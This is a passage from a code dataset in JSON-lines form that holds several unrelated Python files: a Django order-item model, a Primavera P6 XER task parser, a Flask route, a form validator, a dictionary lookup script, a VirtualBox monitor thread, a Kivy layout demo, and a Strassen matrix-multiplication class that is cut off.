models.CharField(max_length=256, null=True, blank=True)\n domain_action = models.CharField(max_length=64, null=True, blank=True)\n\n objects = OrderItemQuerySet.as_manager()\n\n class Meta:\n ordering = ['-created_at']\n\n @property\n def currency(self):\n if self.cart:\n return self.cart.currency\n elif self.order:\n return self.order.currency\n else:\n return None\n\n @property\n def tax_amount(self):\n return self.taxes.aggregate(total=Sum('amount'))['total'] or decimal.Decimal('0.00')\n\n @property\n def setup_fees_total(self):\n return self.setup_fee + self.configurable_options_setup_fees\n\n @property\n def configurable_options_price(self):\n return self.configurable_options.aggregate(total=Sum('price'))['total'] or decimal.Decimal('0.00')\n\n @property\n def configurable_options_setup_fees(self):\n return self.configurable_options.aggregate(total=Coalesce(Sum('setup_fee'), 0))['total']\n\n @property\n def amount_without_taxes(self):\n return (self.fixed_price +\n self.setup_fee +\n self.configurable_options_price +\n self.configurable_options_setup_fees)\n\n @property\n def amount(self):\n amount = self.fixed_price + self.configurable_options_price\n amount += self.tax_amount\n if self.cycle and self.cycle.cycle == CyclePeriods.onetime:\n amount += self.setup_fee + self.configurable_options_setup_fees\n return amount\n\n def __str__(self):\n return '{} {}'.format(self.name, self.description or '')\n\n\nclass OrderItemTax(models.Model):\n cart_item = models.ForeignKey(OrderItem, related_name='taxes', on_delete=models.CASCADE)\n name = models.CharField(max_length=32, db_index=True)\n amount = models.DecimalField(max_digits=12, decimal_places=2)\n description = models.CharField(max_length=128, null=True, blank=True)\n created_at = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n ordering = ['-created_at']\n","repo_name":"pizzhub/backendfleio-test","sub_path":"project/fleio/billing/models/order_item.py","file_name":"order_item.py","file_ext":"py","file_size_in_byte":4822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28048529100","text":"from datetime import datetime\n\nfrom xerparser.model.taskactvs import TaskActvs\n\nfrom xerparser.model.predecessors 
import Predecessors\nfrom xerparser.model.classes.calendar import Calendar\nfrom xerparser.model.activitiyresources import ActivityResources\nfrom xerparser.model.taskprocs import TaskProcs\nimport locale\n\nclass Task:\n obj_list = []\n\n def __init__(self, params, data):\n # Unique ID generated by the system.\n self.task_id = int(params.get('task_id')) if params.get('task_id') else None\n # project to which the activity belongs referenced by system generated unique id\n self.proj_id = int(params.get('proj_id')) if params.get('proj_id') else None\n # wbs element activity assigned to referenced by system unique id\n self.wbs_id = int(params.get('wbs_id')) if params.get('wbs_id') else None\n # calendar assigned to activity referenced by system unique id\n self.clndr_id = int(params.get('clndr_id')) if params.get('clndr_id') else None\n # The physical percent complete can either be user entered or calculated from the activity's weighted steps.\n # There is a project setting specifying this.\n self.phys_complete_pct = locale.atof(params.get('phys_complete_pct')) if 'phys_complete_pct' in params.keys() else None\n # Indicates that the primary resource has sent feedback notes about this activity which have not been\n # reviewed yet.\n self.rev_fdbk_flag = params.get('rev_fdbk_flag') if params.get('rev_fdbk_flag') else None\n # The estimation weight for the activity, used for top-down estimation. Top-down estimation weights are used\n # to calculate the proportion of units that each activity receives in relation to the other activities within\n # the same WBS. Top-down estimation distributes estimated units in a top-down manner to activities using the\n # WBS hierarchy.\n\n self.est_wt = locale.atof(params.get('est_wt').strip()) if 'est_wt' in params.keys() else None\n # Indicates that the planned labor and nonlabor units for the activity will not be modified by top-down\n # estimation.\n self.lock_plan_flag = params.get('lock_plan_flag') if params.get('lock_plan_flag') else None\n # Identifies whether the actual and remaining cost for the expense are computed automatically using the\n # planned cost and the activity's schedule percent complete. If this option is selected,\n # the actual/remaining cost are automatically updated when project actuals are applied. This assumes the\n # expenses are made according to plan.\n self.auto_compute_act_flag = params.get('auto_compute_act_flag') if params.get('auto_compute_act_flag') else None\n # The activity percent complete type is one of \"\"Duration\"\", \"\"Units\"\", or \"\"Physical\"\". The percent complete\n # type controls whether the Activity % Complete is tied to the Duration % Complete, the Units % Complete,\n # or the Physical % Complete for the activity. Set the percent complete type to \"\"Duration\"\" for activities\n # which are duration driven, for example, administration tasks and training classes. Set the percent\n # complete type to \"\"Physical\"\" for activities which are work-product driven, for example, creating a\n # document or a product. Set the percent complete type to \"\"Units\"\" for activities which are work effort\n # driven, for example, providing a consulting service.\n self.complete_pct_type = params.get('complete_pct_type').strip() if params.get('complete_pct_type') else None\n # The type of activity, either 'Task Dependent', 'Resource Dependent', 'Level of Effort', 'Start Milestone'\n # or 'Finish Milestone'. 
A Task Dependent activity is scheduled using the activity's calendar rather than\n # the calendars of the assigned resources. A Resource Dependent activity is scheduled using the calendars of\n # the assigned resources. This type is used when several resources are assigned to the activity,\n # but they may work separately. A Start/Finish Milestone is a zero-duration activity, marking a significant\n # start/end of project event. A Level of Effort activity has a duration which is determined by its dependent\n # activities. Administration-type activities are typically level of effort.\n self.task_type = params.get('task_type').strip() if params.get('task_type') else None\n # The duration type of the activity. One of \"\"Fixed Units per Time\"\", \"\"Fixed Duration\"\", or \"\"Fixed Units\"\".\n # For Fixed Units per Time activities, the resource units per time are constant when the activity duration\n # or units are changed. This type is used when an activity has fixed resources with fixed productivity\n # output per time period. For Fixed Duration activities, the activity duration is constant as the units or\n # resource units per time are changed. This type is used when the activity is to be completed within a fixed\n # time period regardless of the resources assigned. For Fixed Units activities, the activity units are\n # constant when the duration or resource units per time are changed. This type is used when the total amount\n # of work is fixed, and increasing the resources can decrease the activity duration.\n self.duration_type = params.get('duration_type').strip() if params.get('duration_type') else None\n # The current status of the activity, either Not Started, In Progress, or Completed.\n self.status_code = params.get('status_code').strip() if params.get('status_code') else None\n # A short ID which uniquely identifies the activity within the project.\n self.task_code = params.get('task_code').strip() if params.get('task_code') else None\n # The name of the activity. The activity name does not have to be unique.\n self.task_name = params.get('task_name').strip() if params.get('task_name') else None\n # Resource ID Name\n self.rsrc_id = int(params.get('rsrc_id').strip()) if params.get('rsrc_id') else None\n # The amount of time the wbs can be delayed before delaying the project finish date. Total int can be\n # computed as Late Start - Early Start or as Late Finish - Early Finish; this option can be set when running\n # the project scheduler.\n self.total_float_hr_cnt = locale.atof(params.get('total_float_hr_cnt').strip()) if params.get('total_float_hr_cnt') and \\\n params.get('total_float_hr_cnt') != '' else None\n # The amount of time the activity can be delayed before delaying the start date of any successor activity.\n self.free_float_hr_cnt = locale.atof(params.get('free_float_hr_cnt')) if params.get('free_float_hr_cnt') else None\n # Remaining duration is the total working time from the activity remaining start date to the remaining finish\n # date. The remaining working time is computed using the activity's calendar. Before the activity is\n # started, the remaining duration is the same as the Original Duration. 
After the activity is completed the\n # remaining duration is zero.\n self.remain_drtn_hr_cnt = locale.atof(params.get('remain_drtn_hr_cnt').strip()) if params.get('remain_drtn_hr_cnt') else 0\n # The total actual labor units for all child activities\n self.act_work_qty = locale.atof(params.get('act_work_qty')) if params.get('act_work_qty') else None\n # The remaining units for all labor resources assigned to the activity. The remaining units reflects the work\n # remaining to be done for the activity. Before the activity is started, the remaining units are the same as\n # the planned units. After the activity is completed, the remaining units are zero.\n self.remain_work_qty = locale.atof(params.get('remain_work_qty')) if params.get('remain_work_qty') else None\n # The planned units for all labor resources assigned to the activity.\n self.target_work_qty = locale.atof(params.get('target_work_qty')) if params.get('target_work_qty') else None\n # Original Duration is the planned working time for the resource assignment on the activity,\n # from the resource's planned start date to the planned finish date. The planned working time is computed\n # using the calendar determined by the Activity Type. Resource Dependent activities use the resource's\n # calendar; other activity types use the activity's calendar. This is the duration that Timesheets users\n # follow and the schedule variance is measured against.\n self.target_drtn_hr_cnt = locale.atof(params.get('target_drtn_hr_cnt').strip()) if params.get('target_drtn_hr_cnt') else None\n # The planned units for all nonlabor resources assigned to the activity.\n self.target_equip_qty = locale.atof(params.get('target_equip_qty')) if params.get('target_equip_qty') else None\n # The actual units for all nonlabor resources assigned to the activities under the WBS.\n self.act_equip_qty = locale.atof(params.get('act_equip_qty')) if params.get('act_equip_qty') else None\n # The remaining units for all nonlabor resources assigned to the activity. The remaining units reflects the\n # work remaining to be done for the activity. Before the activity is started, the remaining units are the\n # same as the planned units. After the activity is completed, the remaining units are zero.\n self.remain_equip_qty = locale.atof(params.get('remain_equip_qty')) if params.get('remain_equip_qty') else None\n # The constraint date for the activity, if the activity has a constraint. The activity's constraint type\n # determines whether this is a start date or finish date. Activity constraints are used by the project\n # scheduler.\n self.cstr_date = datetime.strptime(params.get('cstr_date'), '%Y-%m-%d %H:%M') if params.get('cstr_date') else None\n # The date on which the activity is actually started.\n self.act_start_date = datetime.strptime(params.get('act_start_date'), '%Y-%m-%d %H:%M') if params.get('act_start_date') else None\n # The date on which the activity is actually finished.\n self.act_end_date = datetime.strptime(params.get('act_end_date'), '%Y-%m-%d %H:%M') if params.get('act_end_date') else None\n # the activity late start date\n self.late_start_date = datetime.strptime(params.get('late_start_date'), '%Y-%m-%d %H:%M') if params.get('late_start_date') else None\n # The latest possible date the activity must finish without delaying the project finish date. 
This date is\n # computed by the project scheduler based on network logic, schedule constraints, and resource availability.\n self.late_end_date = datetime.strptime(params.get('late_end_date'), '%Y-%m-%d %H:%M') if params.get('late_end_date') else None\n # The date the activity is expected to be finished according to the progress made on the activity's work\n # products. The expected finish date is entered manually by people familiar with progress of the activity's\n # work products.\n self.expect_end_date = datetime.strptime(params.get('expect_end_date'), '%Y-%m-%d %H:%M') if params.get('expect_end_date') else None\n # The earliest possible date the remaining work for the activity can begin. This date is computed by the\n # project scheduler based on network logic, schedule constraints, and resource availability.\n self.early_start_date = datetime.strptime(params.get('early_start_date'), '%Y-%m-%d %H:%M') if params.get('early_start_date') else None\n # The earliest possible date the activity can finish. This date is computed by the project scheduler based on\n # network logic, schedule constraints, and resource availability.\n self.early_end_date = datetime.strptime(params.get('early_end_date'), '%Y-%m-%d %H:%M') if params.get('early_end_date') else None\n # The date the remaining work for the activity is scheduled to begin. This date is computed by the project\n # scheduler but can be updated manually by the project manager. Before the activity is started,\n # the remaining start date is the same as the planned start date. This is the start date that Timesheets\n # users follow.\n self.restart_date = datetime.strptime(params.get('restart_date'), '%Y-%m-%d %H:%M') if params.get('restart_date') else None\n # The date the remaining work for the activity is scheduled to finish. This date is computed by the project\n # scheduler but can be updated manually by the project manager. Before the activity is started, the remaining\n # finish date is the same as the planned finish date. This is the finish date that Timesheets users follow.\n self.reend_date = datetime.strptime(params.get('reend_date'), '%Y-%m-%d %H:%M') if params.get('reend_date') else None\n # The date the activity is scheduled to begin. This date is computed by the project scheduler but can be\n # updated manually by the project manager. This date is not changed by the project scheduler after the\n # activity has been started.\n self.target_start_date = datetime.strptime(params.get('target_start_date'), '%Y-%m-%d %H:%M') if params.get('target_start_date') else None\n # The date the activity is scheduled to finish. This date is computed by the project scheduler but can be\n # updated manually by the project manager. This date is not changed by the project scheduler after the\n # activity has been started.\n self.target_end_date = datetime.strptime(params.get('target_end_date'), '%Y-%m-%d %H:%M') if params.get('target_end_date') else None\n # Remaining late start date is calculated by the scheduler.\n self.rem_late_start_date = datetime.strptime(params.get('rem_late_start_date'), '%Y-%m-%d %H:%M') if params.get('rem_late_start_date') else None\n # Remaining late end date is calculated by the scheduler.\n self.rem_late_end_date = datetime.strptime(params.get('rem_late_end_date'), '%Y-%m-%d %H:%M') if params.get('rem_late_end_date') else None\n # The type of constraint applied to the activity start or finish date. Activity constraints are used by the\n # project scheduler. 
Start date constraints are 'Start On', 'Start On or Before', 'Start On or After' and\n # 'Mandatory Start'. Finish date constraints are 'Finish On', 'Finish On or Before', 'Finish On or After'\n # and 'Mandatory Finish'. Another type of constraint, 'As Late as Possible', schedules the activity as late\n # as possible based on the available free int.\n self.cstr_type = params.get('cstr_type').strip() if params.get('cstr_type') else None\n self.priority_type = params.get('priority_type').strip() if params.get('priority_type') else None\n # The date progress is suspended on an activity.\n self.suspend_date = datetime.strptime(params.get('suspend_date').strip(), '%Y-%m-%d %H:%M') if params.get('suspend_date') else None\n # The date progress is resumed on an activity.\n self.resume_date = datetime.strptime(params.get('resume_date').strip(), '%Y-%m-%d %H:%M') if params.get('resume_date') else None\n self.int_path = params.get('int_path').strip() if params.get('int_path') else None\n # This field is computed by the project scheduler and identifies the order in which the activities were\n # processed within the int path.\n self.int_path_order = params.get('int_path_order').strip() if params.get('int_path_order') else None\n self.guid = params.get('guid').strip() if params.get('guid') else None\n self.tmpl_guid = params.get('tmpl_guid').strip() if params.get('tmpl_guid') else None\n # The second constraint date for the activity, if the activity has a constraint.\n self.cstr_date2 = datetime.strptime(params.get('cstr_date2'), '%Y-%m-%d %H:%M') if params.get('cstr_date2') else None\n # The second type of constraint applied to the activity start or finish date.\n self.cstr_type2 = params.get('cstr_type2').strip() if params.get('cstr_type2') else None\n self.driving_path_flag = params.get('driving_path_flag') if params.get('driving_path_flag') else None\n # The actual this period units for all labor resources assigned to the activity.\n self.act_this_per_work_qty = locale.atof(params.get('act_this_per_work_qty')) if params.get('act_this_per_work_qty') else None\n # The actual this period units for all nonlabor resources assigned to the activity.\n self.act_this_per_equip_qty = locale.atof(params.get('act_this_per_equip_qty')) if params.get('act_this_per_equip_qty') else None\n # The External Early Start date is the date the external relationship was scheduled to finish. This date may\n # be used to calculate the start date of the current activity during scheduling. 
This field is populated on\n # import when an external relationship is lost.\n try:\n self.external_early_start_date = datetime.strptime(params.get('external_early_start_date').strip(), '%Y-%m-%d %H:%M') if params.get('external_early_start_date') else None\n self.external_late_end_date = datetime.strptime(params.get('external_late_end_date'), '%Y-%m-%d %H:%M') if params.get('external_late_end_date') else None\n except:\n pass\n self.create_date = datetime.strptime(params.get('create_date'), '%Y-%m-%d %H:%M') if params.get('create_date') else None\n self.update_date = datetime.strptime(params.get('update_date'), '%Y-%m-%d %H:%M') if params.get('update_date') else None\n self.create_user = params.get('create_user').strip() if params.get('create_user') else None\n self.update_user = params.get('update_user').strip() if params.get('update_user') else None\n self.location_id = params.get('location_id').strip() if params.get('location_id') else None\n self.calendar = Calendar.find_by_id(self.clndr_id)\n # self.wbs = WBS.find_by_id(int(self.wbs_id) if self.wbs_id else None)\n # Task.obj_list.append(self)\n self.data = data\n\n def get_tsv(self):\n tsv = ['%R', self.task_id, self.proj_id, self.wbs_id, self.clndr_id, self.phys_complete_pct, self.rev_fdbk_flag,\n self.est_wt, self.lock_plan_flag, self.auto_compute_act_flag, self.complete_pct_type, self.task_type,\n self.duration_type, self.status_code, self.task_code, self.task_name, self.rsrc_id,\n self.total_float_hr_cnt, self.free_float_hr_cnt, self.remain_drtn_hr_cnt, self.act_work_qty,\n self.remain_work_qty, self.target_work_qty, self.target_drtn_hr_cnt, self.target_equip_qty,\n self.act_equip_qty, self.remain_equip_qty,\n self.cstr_date.strftime('%Y-%m-%d %H:%M') if self.cstr_date else None,\n self.act_start_date.strftime('%Y-%m-%d %H:%M') if self.act_start_date else None,\n self.act_end_date.strftime('%Y-%m-%d %H:%M') if self.act_end_date else None,\n self.late_start_date.strftime('%Y-%m-%d %H:%M') if self.late_start_date else None,\n self.late_end_date.strftime('%Y-%m-%d %H:%M') if self.late_end_date else None,\n self.expect_end_date.strftime('%Y-%m-%d %H:%M') if self.expect_end_date else None,\n self.early_start_date.strftime('%Y-%m-%d %H:%M') if self.early_start_date else None,\n self.early_end_date.strftime('%Y-%m-%d %H:%M') if self.early_end_date else None,\n self.restart_date.strftime('%Y-%m-%d %H:%M') if self.restart_date else None,\n self.reend_date.strftime('%Y-%m-%d %H:%M') if self.reend_date else None,\n self.target_start_date.strftime('%Y-%m-%d %H:%M') if self.target_start_date else None,\n self.target_end_date.strftime('%Y-%m-%d %H:%M') if self.target_end_date else None,\n self.rem_late_start_date.strftime('%Y-%m-%d %H:%M') if self.rem_late_start_date else None,\n self.rem_late_end_date.strftime('%Y-%m-%d %H:%M') if self.rem_late_end_date else None,\n self.cstr_type, self.priority_type,\n self.suspend_date.strftime('%Y-%m-%d %H:%M') if self.suspend_date else None,\n self.resume_date.strftime('%Y-%m-%d %H:%M') if self.resume_date else None,\n self.int_path, self.int_path_order, self.guid, self.tmpl_guid,\n self.cstr_date2.strftime('%Y-%m-%d %H:%M') if self.cstr_date2 else None,\n self.cstr_type2, self.driving_path_flag,\n self.act_this_per_work_qty, self.act_this_per_equip_qty,\n self.external_early_start_date.strftime('%Y-%m-%d %H:%M') if self.external_early_start_date else None,\n self.external_late_end_date.strftime('%Y-%m-%d %H:%M') if self.external_late_end_date else None,\n self.create_date.strftime('%Y-%m-%d %H:%M') if 
self.create_date else None,\n               self.update_date.strftime('%Y-%m-%d %H:%M') if self.update_date else None,\n               self.create_user, self.update_user, self.location_id]\n        return tsv\n\n    @property\n    def id(self):\n        return self.task_id\n\n    @property\n    def totalfloat(self):\n        if self.total_float_hr_cnt:\n            tf = float(self.total_float_hr_cnt)/8.0\n        else:\n            return None\n        return tf\n\n    @property\n    def resources(self):\n        return self.data.taskresource.find_by_activity_id(self.task_id)\n\n    @property\n    def steps(self):\n        return TaskProcs.find_by_activity_id(self.task_id)\n\n    @property\n    def activitycodes(self):\n        return self.data.taskactvcodes.find_by_activity_id(self.task_id)\n\n\n    @property\n    def duration(self):\n        dur = None\n        if self.target_drtn_hr_cnt:\n            if self.calendar.day_hr_cnt:\n                dur = self.target_drtn_hr_cnt / self.calendar.day_hr_cnt\n            else:\n                dur = self.target_drtn_hr_cnt / 8.0\n        else:\n            dur = 0.0\n        return dur\n\n    @property\n    def constraints(self):\n        if self.cstr_type == None or self.cstr_date == None:\n            return None\n        return {\"ConstraintType\": self.cstr_type,\n                \"ConstraintDate\": self.cstr_date\n                }\n\n    @property\n    def start_date(self):\n        if self.act_start_date:\n            return self.act_start_date\n        else:\n            return self.target_start_date\n\n    @property\n    def end_date(self):\n        if self.act_end_date:\n            return self.act_end_date\n        else:\n            return self.target_end_date\n\n    @property\n    def successors(self):\n        suss = self.data.predecessors.get_successors(self.task_id)\n        return suss\n\n    @property\n    def predecessors(self):\n        return self.data.predecessors.get_predecessors(self.task_id)\n\n    @classmethod\n    def find_by_wbs_id(cls, wbs_id):\n        return [v for v in cls.obj_list if v.wbs_id == wbs_id]\n\n    def __repr__(self):\n        return self.task_code\n\n\n","repo_name":"HassanEmam/PyP6Xer","sub_path":"xerparser/model/classes/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":23201,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"}{"seq_id":"33156691218","text":"\"\"\"Energies resources\"\"\"\n\nfrom flask.views import MethodView\n\nfrom bemserver_core.model import Energy\n\nfrom bemserver_api import Blueprint\n\nfrom .schemas import EnergySchema\n\n\nblp = Blueprint(\n    \"Energy\",\n    __name__,\n    url_prefix=\"/energies\",\n    description=\"Operations on energies\",\n)\n\n\n@blp.route(\"/\")\nclass EnergyViews(MethodView):\n    @blp.login_required\n    @blp.etag\n    @blp.response(200, EnergySchema(many=True))\n    def get(self):\n        \"\"\"List energies\"\"\"\n        return Energy.get()\n","repo_name":"BEMServer/bemserver-api","sub_path":"bemserver_api/resources/energies/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}{"seq_id":"9970962513","text":"def make_error(code, text):\n    return {\n        \"code\": code,\n        \"text\": text\n    }\n\n\ndef get_errors(data, fields):\n    errors = []\n\n    for field in fields:\n        code = field['code']\n        title = field['title']\n\n        # required\n        if field['is_required'] and code not in data:\n            errors.append(make_error(code, f\"Заполните поле {title}\"))\n            continue\n\n        if not field['is_required'] and code not in data:\n            continue\n\n        # datatype\n        if field[\"type\"] == \"int\":\n            try:\n                data[code] = int(data[code])\n            except:\n                errors.append(make_error(code, f\"Значение {title} должно быть целым числом\"))\n                continue\n\n        elif field[\"type\"] == \"float\":\n            try:\n                data[code] = float(data[code])\n            except:\n                errors.append(make_error(code, f\"Значение {title} 
должно быть числом\"))\n continue\n\n elif field[\"type\"] == \"radio\" or field[\"type\"] == \"select\":\n print(field)\n options = list(map(lambda variant: variant['value'], field['options']))\n\n if data[code] not in options:\n errors.append(make_error(code, f\"Недопустимое значение {title}\"))\n continue\n\n value = data[code]\n\n # limits\n if \"limits\" in field:\n for rule in field[\"limits\"]:\n if rule[\"type\"] == \"max\":\n if value > rule['value']:\n errors.append(make_error(code, f\"Значение {title} должно быть меньше {rule['value']}\"))\n continue\n if rule[\"type\"] == \"min\":\n if value < rule['value']:\n errors.append(make_error(code, f\"Значение {title} должно быть больше {rule['value']}\"))\n continue\n\n return errors\n","repo_name":"roctbb/mcalc","sub_path":"backend/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39115490444","text":"import difflib as df\nimport json as j\n\ndata = j.load(open(\"data.json\"))\n\n\ndef translate(word):\n if word.lower() in data:\n return data[word]\n elif len(df.get_close_matches(word, data.keys(), n=5, cutoff=0.7)):\n x = df.get_close_matches(word, data.keys(), n=5, cutoff=0.7)\n y = \"\"\n for i in x:\n y = y + \" -- \" + i + \" -- \"\n choice = input(\n \"Do you mean to find the meaning if the follwing words\" + y + \"Then type Yes or No\\nYes\\\\No --> \")\n if choice.lower() == \"yes\":\n newWord = input(\"Enter the word again --> \")\n return translate(newWord)\n elif choice.lower() == \"no\":\n newWords = input(\"Reenter the word --> \")\n return translate(newWords)\n else:\n return \"We can't understand \"\n\n else:\n return \"\\\"\" + word + \"\\\" Has no meaning in the dictionary\"\n\n\nword = input(\"Enter the word to find its meaning --> \")\noutput = translate(word)\nif type(output) == list:\n print(\"Meaning of the word is \" + \" ==>\")\n for i in output:\n print(\" \" * len(\"Meaning of the word is \") + \"-->\" + i + \"\\n\")\nelse:\n print(output)\n","repo_name":"abhishekgupta0912/Interactive_English_Dictionary","sub_path":"Data/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23627333937","text":"# -*- coding: utf8 -*-\n__author__ = '54'\nimport time\nfrom PyQt4.QtCore import *\nclass Monitor(QThread):\n def __init__(self,Vcenter,parent=None):\n QThread.__init__(self, parent)#添加QThread初始化方法\n self.Vcenter=Vcenter\n self.connect(self,SIGNAL('vmrefresh(QString,QString)'),self.Vcenter.widgetvmReflash)\n self.connect(self,SIGNAL('hostrefresh(QString,QString)'),self.Vcenter.widgethostReflash)\n self.flag=False\n self.host=None\n self.vm=None\n\n def stop(self):\n self.flag=False\n self.host=None\n self.vm=None\n\n def run(self):\n self.flag=True\n while self.flag:\n if self.vm is not None and self.vm.PowerState == '5' and self.host.isOnline:\n self.host.socket_processor.vb.get_guest_performance(self.vm.Name)\n time.sleep(1)\n self.emit(SIGNAL('vmrefresh(QString,QString)'),self.host.Name,self.vm.Name)\n elif self.host.isOnline:\n self.host.socket_processor.vb.get_host_cpu_usage()\n self.host.socket_processor.vb.get_host_mem_avail()\n self.host.socket_processor.vb.get_host_storageinfo()\n time.sleep(1)\n 
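                # Emit the Qt signal connected to widgethostReflash so the GUI thread refreshes this host's stats.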
self.emit(SIGNAL('hostrefresh(QString,QString)'),self.host.Name,self.host.Name)","repo_name":"pvt54/VboxCenter","sub_path":"monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4156040519","text":"from kivy.app import App\r\nfrom kivy.uix.widget import Widget\r\nfrom kivy.uix.button import Button\r\nfrom kivy.uix.floatlayout import FloatLayout\r\n\r\n\"\"\"\r\nThis is a demonstration of how widgets are displayed in\r\nthe 'FloatLayout' in Kivy\r\nThis first example will be super simple.\r\n\"\"\"\r\n\r\n\r\nclass RootWidget(FloatLayout):\r\n\r\n def __init__(self, **kwargs):\r\n super(RootWidget, self).__init__(**kwargs)\r\n \"\"\"\r\n self.add_widget(Button(size=(500, 200),\r\n pos=(0, 0),\r\n text='btn 1'))\r\n self.add_widget(Button(size=(300, 500),\r\n pos=(200, 20),\r\n text='btn 2'))\r\n self.add_widget(Button(size_hint=(.5, .20),\r\n pos=(20, 200),\r\n text='btn 3'))\r\n self.add_widget(Button(size_hint=(.5, .20),\r\n pos=(200, 200),\r\n text='btn 4'))\r\n \"\"\"\r\n self.add_widget(Button(size_hint=(.5, .20), #size is 50% of the window width and 20% of the window height\r\n pos_hint={'x': .0, 'y': .0}, #position is displaced by 0% x and 0%y\r\n text='btn 1'))\r\n self.add_widget(Button(size_hint=(.3, .5), #size is 30% of the window width and 50% of the window height\r\n pos_hint={'x': .2, 'y': .45}, #position is displaced by 20% x and 45%y\r\n text='btn 2'))\r\n self.add_widget(Button(size_hint=(.5, .20), #size is 50% of the window width and 20% of the window height\r\n pos_hint={'x': .5, 'y': .0}, #position is halfway up the window, and touching the left side\r\n text='btn 3'))\r\n self.add_widget(Button(size_hint=(.2, .20),\r\n pos_hint={'x': .2, 'y': .2}, #a fifth of the way up the window, a fifth right of the window\r\n text='btn 4'))\r\n #\"\"\"\r\nclass TestApp(App):\r\n\r\n def build(self):\r\n return RootWidget()\r\n\r\n\r\nif __name__ == '__main__':\r\n TestApp().run()","repo_name":"hwynn/Kivy-Examples","sub_path":"Style/exLayoutFloatPyStaticVsStretch.py","file_name":"exLayoutFloatPyStaticVsStretch.py","file_ext":"py","file_size_in_byte":2098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35508388682","text":"\n\nclass Matrix:\n\n def importData(self, data, rows=-1, columns=-1):\n self.data = data\n if rows == -1:\n self.rows = len(data)\n else:\n self.rows = rows\n if columns == -1:\n if self.rows > 0:\n self.columns = len(data[0])\n else:\n self.columns = 0\n else:\n self.columns = columns\n return self\n \n def makeMatrix(self, rows, columns):\n self.rows = rows\n self.columns = columns\n self.data=[]\n for _ in range(self.rows):\n col = []\n for _ in range(self.columns):\n col.append(0)\n self.data.append(col)\n return self\n\n def makeSubMatrix(self, rows, columns, reference, startRow, startCol):\n self.rows = rows\n self.columns = columns\n self.data=[]\n for i in range(self.rows):\n col = []\n for j in range(self.columns):\n col.append(reference[startRow + i][startCol + j])\n self.data.append(col)\n return self\n \n def __len__(self):\n return self.rows\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __add__(self, other):\n if not self.rows == other.rows or not self.columns == other.columns:\n raise Exception(\"Incompatible matrices, addition failed\")\n\n result = Matrix().makeMatrix(self.rows, self.columns)\n for i in range(self.rows):\n for j in 
range(self.columns):\n result[i][j] = self[i][j] + other[i][j]\n return result\n\n def __sub__(self, other):\n if not self.rows == other.rows or not self.columns == other.columns:\n raise Exception(\"Incompatible matrices, subtraction failed\")\n\n result = Matrix().makeMatrix(self.rows, self.columns)\n for i in range(self.rows):\n for j in range(self.columns):\n result[i][j] = self[i][j] - other[i][j]\n return result\n\n # Basic matrix multiplication\n def BMM(self, other):\n if not self.columns == other.rows:\n raise Exception(\"Incompatible matrices, BMM failed\")\n\n result = Matrix().makeMatrix(self.rows, other.columns)\n\n for i in range(0, result.rows):\n for j in range(0, result.columns):\n sum = 0\n for k in range(0, self.columns):\n a = self[i][k]\n b = other[k][j]\n sum = sum + a * b\n result[i][j] = sum\n return result\n\n def SAM(self, other):\n if self.rows != self.columns or other.rows != other.columns:\n raise Exception(\"Matrices must be square; SAM failed\")\n if self.columns != other.rows:\n raise Exception(\"Incompatible matrices, SAM failed\")\n \n if (self.rows == 1):\n result = Matrix().importData([[\n self[0][0] * other[0][0]\n ]])\n return result\n\n # Check that matrix is a power of 2\n if (not (self.rows & (self.rows-1) == 0) and self.rows != 0):\n m = Matrix.__findNextPowerOf2(self.rows)\n # Deep copy of self and other (as to not modify their data)\n a = Matrix().importData([row[:] for row in self.data])\n a.expandMatrix(m, m)\n b = Matrix().importData([row[:] for row in other.data])\n b.expandMatrix(m, m)\n else:\n a = self\n b = other\n\n # Result matrix\n result = Matrix().makeMatrix(a.rows, a.columns)\n # Dimensions of sub-matrices\n k = a.rows // 2\n # Define and initialize sub-matrices (may be slow)\n ma11 = Matrix().makeSubMatrix(k, k, a, 0, 0)\n ma12 = Matrix().makeSubMatrix(k, k, a, 0, k)\n ma21 = Matrix().makeSubMatrix(k, k, a, k, 0)\n ma22 = Matrix().makeSubMatrix(k, k, a, k, k)\n mb11 = Matrix().makeSubMatrix(k, k, b, 0, 0)\n mb12 = Matrix().makeSubMatrix(k, k, b, 0, k)\n mb21 = Matrix().makeSubMatrix(k, k, b, k, 0)\n mb22 = Matrix().makeSubMatrix(k, k, b, k, k)\n # Define + initialize has a runtime of 8(k^2)\n # \t- Optimized to 7(k^2), but still a nasty amount of overhead\n # If this was programmed in c, we could simply move the pointers\n # \tfor this to run in constant time\n\n p1 = ma11.SAM(mb12 - mb22)\n p2 = (ma11 + ma12).SAM(mb22)\n p3 = (ma21 + ma22).SAM(mb11)\n p4 = ma22.SAM(mb21 - mb11)\n p5 = (ma11 + ma22).SAM(mb11 + mb22)\n p6 = (ma12 - ma22).SAM(mb21 + mb22)\n p7 = (ma11 - ma21).SAM(mb11 + mb12)\n\n mr11 = (p5 + p4 + p6) - p2\n mr12 = p1 + p2\n mr21 = p3 + p4\n mr22 = (p5 + p1) - p3 - p7\n\n for i in range(k):\n for j in range(k):\n result[i][j] = mr11[i][j]\n result[i][j+k] = mr12[i][j]\n result[k+i][j] = mr21[i][j]\n result[k+i][k+j] = mr22[i][j]\n # Trim result back down to correct size\n result.rows = self.rows\n result.columns = self.columns\n result.data = [result[i][:result.columns] for i in range(result.rows)]\n\n return result\n\n def SAMk(self, other, cutoff=8):\n if self.rows != self.columns or other.rows != other.columns:\n raise Exception(\"Matrices must be square; SAMk failed\")\n if self.columns != other.rows:\n raise Exception(\"Incompatible matrices, SAMk failed\")\n\n if 